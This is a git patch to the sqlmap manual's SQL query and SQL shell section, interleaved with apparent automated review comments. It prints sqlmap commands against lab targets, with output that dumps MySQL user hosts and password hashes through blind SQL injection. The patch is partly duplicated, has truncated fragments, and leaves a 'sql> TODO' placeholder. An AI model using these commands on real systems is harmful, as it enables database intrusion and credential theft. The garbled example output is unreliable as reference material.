From 77d9d22cebf96ba3a0252b19235af58ee259a558 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Options: --sql-query
and --sql-shell
The SQL query and the SQL shell features makes the user able to run
-whatever SELECT
statement on the web application's back-end
-database management system and retrieve its output.
SELECT
statement it will retrieve its output through the blind SQL
+injection or UNION query SQL injection technique depending on the user's
+options, otherwise it will execute the query through the stacked query
+SQL injection technique if the web application supports multiple
+statements on the back-end database management system.
Examples on a Microsoft SQL Server 2000 Service Pack 0 target:
@@ -3495,9 +3501,9 @@ SELECT 'foo', 'bar': 'foo, bar'
As you can see from this last example, sqlmap splits the query in two
different SELECT
statement to be able to retrieve the output even
-when using blind SQL injection technique.
-Otherwise in inband SQL injection technique it only perform a single HTTP
-request to get the user's query output:
@@ -3524,24 +3530,12 @@ SELECT 'foo', 'bar' [1]:
-Examples on an Oracle XE 10.2.0.1 target:
--
-
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-query \
- "SELECT 'foo' FROM dual" -v 0
-
-[hh:mm:04] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] n
-SELECT 'foo' FROM dual: 'foo'
-
-
-
-
-As you can see, if your SELECT
statement contains a FROM
-clause, sqlmap asks the user if such statement can return multiple entries
-and in such case the tool knows how to unpack the query correctly to
-retrieve its whole output line per line when going through blind SQL
-injection technique.
If your SELECT
statement contains a FROM
clause, sqlmap
+asks the user if such statement can return multiple entries and in such
+case the tool knows how to unpack the query correctly to retrieve its
+whole output entry per entry when going through blind SQL injection
+technique. Through UNION query SQL injection it retrieved the whole output
+in a single response.
Example on a PostgreSQL 8.3.5 target:
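Review bot: tense slips in the sentence this hunk adds: "+technique. Through UNION query SQL injection it retrieved the whole output / +in a single response." sits between present-tense verbs ("asks", "knows") and should read "it retrieves the whole output in a single response"; "if such statement can return multiple entries" earlier in the same hunk should be "if such a statement". The identical wording is added again in the second file's hunk further down, so both copies need the fix.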
@@ -3550,9 +3544,9 @@ injection technique.
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query \ "SELECT usename FROM pg_user" -v 0 -[hh:mm:47] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y -[hh:mm:48] [INPUT] the SQL query that you provide can return up to 3 entries. How many -entries do you want to retrieve? +[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y +[hh:mm:37] [INPUT] the SQL query provided can return up to 2 entries. How many entries +do you want to retrieve? [a] All (default) [#] Specific number [q] Quit @@ -3564,72 +3558,62 @@ SELECT usename FROM pg_user [2]: -As you can see from the last example, sqlmap counts the number of entries -for your query and asks how many entries from the top you want to dump. +
As you can see from the last example, sqlmap counted the number of entries
+for your query and asks how many entries you want to dump.
Otherwise if you specify also the LIMIT
, or similar, clause
-sqlmap will not ask anything, just unpack the query and return its
-output line per line when going through blind SQL injection technique.
Example on a MySQL 5.0.67 target:
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query \
- "SELECT user, host, password FROM mysql.user LIMIT 1, 3" -v 1
+ "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
[...]
back-end DBMS: MySQL >= 5.0.0
-[hh:mm:11] [INFO] fetching SQL SELECT query output: 'SELECT user, host, password FROM
+[hh:mm:22] [INFO] fetching SQL SELECT statement query output: 'SELECT host, password FROM
mysql.user LIMIT 1, 3'
-[hh:mm:12] [INFO] the SQL query provided has more than a field. sqlmap will now unpack
-it into distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user
-ORDER BY user ASC LIMIT 1, 1
-[hh:mm:12] [INFO] retrieved: root
-[hh:mm:12] [INFO] performed 34 queries in 0 seconds
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user
-ORDER BY user ASC LIMIT 1, 1
-[hh:mm:12] [INFO] retrieved: localhost
-[hh:mm:12] [INFO] performed 69 queries in 0 seconds
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user
-ORDER BY user ASC LIMIT 1, 1
-[hh:mm:12] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
-[hh:mm:13] [INFO] performed 293 queries in 0 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user
-ORDER BY user ASC LIMIT 2, 1
-[hh:mm:13] [INFO] retrieved: root
-[hh:mm:13] [INFO] performed 34 queries in 0 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user
-ORDER BY user ASC LIMIT 2, 1
-[hh:mm:13] [INFO] retrieved: leboyer
-[hh:mm:13] [INFO] performed 55 queries in 0 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user
-ORDER BY user ASC LIMIT 2, 1
-[hh:mm:13] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
-[hh:mm:14] [INFO] performed 293 queries in 0 seconds
-[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user
-ORDER BY user ASC LIMIT 3, 1
-[hh:mm:14] [INFO] retrieved: root
-[hh:mm:14] [INFO] performed 34 queries in 0 seconds
-[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user
-ORDER BY user ASC LIMIT 3, 1
-[hh:mm:14] [INFO] retrieved: 192.168.1.121
-[hh:mm:14] [INFO] performed 69 queries in 0 seconds
-[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user
-ORDER BY user ASC LIMIT 3, 1
-[hh:mm:14] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
-[hh:mm:15] [INFO] performed 293 queries in 0 seconds
-SELECT user, host, password FROM mysql.user LIMIT 1, 3 [3]:
-[*] root, localhost, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
-[*] root, leboyer, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
-[*] root, 192.168.1.121, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
+[hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it
+into distinct queries to be able to retrieve the output even if we are going blind
+[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM
+mysql.user LIMIT 1, 1
+[hh:mm:22] [INFO] retrieved: localhost
+[hh:mm:22] [INFO] performed 69 queries in 0 seconds
+[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM
+mysql.user LIMIT 1, 1
+[hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
+[hh:mm:24] [INFO] performed 293 queries in 2 seconds
+[hh:mm:24] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM
+mysql.user LIMIT 2, 1
+[hh:mm:24] [INFO] retrieved: localhost
+[hh:mm:25] [INFO] performed 69 queries in 0 seconds
+[hh:mm:25] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM
+mysql.user LIMIT 2, 1
+[hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
+[hh:mm:27] [INFO] performed 293 queries in 2 seconds
+[hh:mm:27] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM
+mysql.user LIMIT 3, 1
+[hh:mm:27] [INFO] retrieved: localhost
+[hh:mm:28] [INFO] performed 69 queries in 0 seconds
+[hh:mm:28] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32))
+FROM mysql.user LIMIT 3, 1
+[hh:mm:28] [INFO] retrieved:
+[hh:mm:28] [INFO] performed 6 queries in 0 seconds
+SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
+[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
+[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
+[*] localhost,
The SQL shell option gives you access to run your own SQL statement -interactively, like a SQL console logged into the back-end database +interactively, like a SQL console logged to the back-end database management system. This feature has TAB completion and history support.
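Review bot: the replacement MySQL example drops the "ORDER BY user ASC" that the removed per-column queries carried, so each unpacked query ("SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user LIMIT 1, 1" and its password counterpart) is now a separate LIMIT n, 1 query with no deterministic row order, and MySQL gives no guarantee that the host and the password come from the same row. The captured output (three identical "localhost" hosts and an empty third password at "+[*] localhost,") looks like exactly that kind of mismatch and should not go into the manual as reference output until the ordering is restored in the generated queries or the run is recaptured. Minor: "the SQL query provided has more than a field" should be "more than one field", and "fetching SQL SELECT statement query output" reads doubled; "fetching SQL SELECT statement output" is enough.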
@@ -3804,6 +3788,23 @@ an asterisk instead of the column(s) name, sqlmap first retrieves the column names of the table then asks if the query can return multiple entries and goes on. +Example of SQL statement other than SELECT
on an Oracle XE
+10.2.0.1 target:
+
+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-shell -v 1
+
+[...]
+back-end DBMS: Oracle
+
+[hh:mm:20] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTER
+sql> TODO
+
+
+
+
+
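Review bot: the added Oracle SQL shell example stops at "+sql> TODO", so this hunk commits an unfinished placeholder into the manual; either complete the transcript with the non-SELECT statement the lead-in promises and sqlmap's response to it, or leave the example out until it has been captured. The lead-in "+Example of SQL statement other than SELECT on an Oracle XE / +10.2.0.1 target:" should also say what the example is meant to show, namely the stacked-query execution path that the rewritten description at the top of the patch describes for non-SELECT statements.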

Options: --sql-query and --sql-shell
The SQL query and the SQL shell features makes the user able to run
-whatever SELECT statement on the web application's back-end
-database management system and retrieve its output.
+custom SQL statement on the web application's back-end database management.
+sqlmap automatically recognize the type of SQL statement provided and
+choose which SQL injection technique to use to execute it: if it is a
+SELECT statement it will retrieve its output through the blind SQL
+injection or UNION query SQL injection technique depending on the user's
+options, otherwise it will execute the query through the stacked query
+SQL injection technique if the web application supports multiple
+statements on the back-end database management system.
Examples on a
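Review bot: grammar in the rewritten description: "+sqlmap automatically recognize the type of SQL statement provided and / +choose which SQL injection technique to use" needs "recognizes" and "chooses", and "+custom SQL statement on the web application's back-end database management." drops the word "system" that the removed line had. While this paragraph is being touched, the unchanged opening "The SQL query and the SQL shell features makes the user able to run" should become "features make" (or simply "let the user run").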
As you can see from this last example, sqlmap splits the query in two
different SELECT statement to be able to retrieve the output even
-when using blind SQL injection technique.
-Otherwise in inband SQL injection technique it only perform a single HTTP
-request to get the user's query output:
+when using the blind SQL injection technique.
+Otherwise in UNION query SQL injection technique it only performs a single
+HTTP request to get the user's query output:
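Review bot: the unchanged lead-in kept by this hunk, "splits the query in two different SELECT statement", still needs the plural "statements", and the new line "+Otherwise in UNION query SQL injection technique it only performs a single" reads more naturally as "Otherwise, with the UNION query SQL injection technique it performs only a single HTTP request to get the user's query output".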
-Examples on an
-As you can see, if your SELECT statement contains a FROM
-clause, sqlmap asks the user if such statement can return multiple entries
-and in such case the tool knows how to unpack the query correctly to
-retrieve its whole output line per line when going through blind SQL
-injection technique.
+If your SELECT statement contains a FROM clause, sqlmap
+asks the user if such statement can return multiple entries and in such
+case the tool knows how to unpack the query correctly to retrieve its
+whole output entry per entry when going through blind SQL injection
+technique. Through UNION query SQL injection it retrieved the whole output
+in a single response.
Example on a
-As you can see from the last example, sqlmap counts the number of entries
-for your query and asks how many entries from the top you want to dump.
+As you can see from the last example, sqlmap counted the number of entries
+for your query and asks how many entries you want to dump.
Otherwise if you specify also the LIMIT, or similar, clause
-sqlmap will not ask anything, just unpack the query and return its
-output line per line when going through blind SQL injection technique.
+sqlmap will not ask anything, it just unpacks the query and return its
+output entry per entry when going through blind SQL injection technique.
+Through UNION query SQL injection it retrieved the whole output in a
+single response.
Example on a
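Review bot: "+sqlmap will not ask anything, it just unpacks the query and return its" mixes number ("unpacks ... return") and splices two clauses with a comma; make it "sqlmap will not ask anything: it just unpacks the query and returns its output entry by entry". The trailing "+Through UNION query SQL injection it retrieved the whole output in a / +single response." has the same past-tense slip as the earlier hunk and should be "retrieves".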
The SQL shell option gives you access to run your own SQL statement
-interactively, like a SQL console logged into the back-end database
+interactively, like a SQL console logged to the back-end database
management system.
This feature has TAB completion and history support.
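Review bot: this hunk changes "logged into the back-end database" to "logged to the back-end database", which is a regression rather than a fix: "logged into" is the idiomatic phrase for a console session on the database, so the removed line should be kept as it was.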
@@ -3701,6 +3685,21 @@ an asterisk instead of the column(s) name, sqlmap first retrieves the
column names of the table then asks if the query can return multiple
entries and goes on.
+
+Example of SQL statement other than SELECT on an